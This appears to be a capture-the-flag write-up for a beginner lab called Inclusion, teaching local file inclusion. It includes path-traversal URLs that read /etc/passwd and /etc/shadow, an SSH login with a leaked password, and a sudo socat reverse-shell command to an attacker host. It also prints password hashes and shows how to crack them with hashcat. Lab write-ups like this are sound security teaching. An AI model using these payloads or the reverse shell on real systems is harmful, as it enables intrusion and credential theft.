Today we are going to tackle Inclusion. This is supposed to be a beginner level challenge teaching local file inclusion.
Local File Inclusion allows an attacker to use files on the local machine to execute code or disclose information.
First let’s start off by scanning the machine with our favorite port scanner, Nmap.
nmap -p- -T4 –reason <TargetIP>
-p- scan all the ports
-T4 use the second fastest speed
–reason Nmap will tell you why it thinks a port is opened or closed.
nmap -p 22,80 -sV -T4 –reason <TargetIP>
Looks like we have a web server running, so let’s check it out. By visiting the View details button using Hacking this world we can learn how the website is displaying the articles.
It looks like you need to pass a parameter to name in order to view the articles. What if we tried to pass it a binary we can run through directory traversal. We need to move up several directories in order to reach root and then move into the bin directory. You don’t need to know how many directories you need to move up, because you can’t go any higher than root (/). So if we put 100 ../’s in the URL at the end we would just be at the root directory.
I added in the %20 because this is the HTML encoding for space. Sadly this just presented us with an internal server error.
Maybe we can access some sensitive files such as /etc/passwd, where accounts and shell configurations are stored, and /etc/shadow, where password hashes are stored. Typically /etc/shadow is only readable by root and the shadow group, but there can be misconfigurations.
http://<TargetIP>/article?name=../../../../../../../etc/passwd
This file is interesting, because falconfeast has a comment in the file displaying a possible plaintext password. First let’s see if they web server is misconfigured allowing us to read the /etc/shadow file.
http://<TargetIP>/article?name=../../../../../../../etc/shadow
In fact we are able to access the /etc/shadow file. This is most likely because the web server is running as the root user, but we can investigate it after we hack the machine.
Back to the falconfeast user, let’s try to login with the password rootpassword.
ssh falconfeast@<TargetIP>
Enter rootpassword
Wow this ended up giving us SSH access as falconfeast. This is a huge misconfiguration. If this wasn’t there, we may have had to crack the password. It is using SHA256 which is a stronger hashing algorithm, so it may have been more difficult. We can try and crack the passwords at the end.
Great we can grab the user flag and start working on privilege escalation.
The first place I always look for privilege escalation is checking what commands, if any, a user can run as root. Using https://gtfobins.github.io/, this can quickly lead to an easy win.
sudo -l
Well, we can run socat as root without a password! All we need to do is set up a netcat listener. Socat is a program similar to netcat allowing connections through TCP or UDP ports.
Setting up a listener:
nc -nvlp 1337
n – means do not resolve hostnames via dns
v – is for verbose. If you want more message to be more verbose you can add more V’s.
l – is for listen for an incoming connection
p – is for the part you want to listen on.
Now we need to initiate a connection from the target machine to our netcat listener using socat. https://gtfobins.github.io/gtfobins/socat/
sudo /usr/bin/socat tcp-connect:<AttackerIP>:1337 exec:/bin/bash,pty,stderr,setsid,sigint,sane
Here I changed from a normal shell over to a bash shell. I just like a bash shell better.
Just like that we have rooted this machine! This is why you should always be careful when allowing a low privileged user to run commands as root, you never know when someone may be able to privilege escalate!
cat /home/falconfeast/user.txt
cat /root.txt
Now let’s crack those passwords.
root:$6$mFbzBSI/$c80cICObesNyF9XxbF6h6p6U2682MfG5gxJ5KtSLrGI8766/etwzBvppTuug6aLoltiSmeqdIaEUg6f/NLYDn0
falconfeast:$6$dYJsdbeD$rlYGlx24kUUcSHTc0dMutxEesIAUA3d8nQeTt6FblVffELe3FxLE3gOID5nLxpHoycQ9mfSC.TNxLxet9BN5c/
These look like SHA-512 based on my prior experience, but we can confirm using hashid. This tools will tell you what modes to run for john the ripper and hashcat, both password cracking tools. What gives it away that it’s SHA-512 is the $6$ at the front.
Store the 2 hashes in a notepad file called Inclusion.txt, but remove the 2 user names.
hashcat.exe -m 1800 -a3 Inclusion.txt rockyou.txt -O
We were able to crack the root hash in just 59 seconds. The laptop I am running this on is from 2015 with an older graphics card in it, so it’s nothing special.
Surprisingly the password for falconfeast wasn’t cracking. I thought if 123hacker123 cracked, so would rootpassword, but it seems to not be the case. You are able to su to root using the password 123hacker123.
Back to whether the webserver was running as root. Using ps aux we can look for programs that may be running the web server. We find a flash app running on port 80, so we can assume this is the web server and it is indeed running as root.
I hope you enjoyed this quick run through for Local File Inclusion, until next time keep hacking!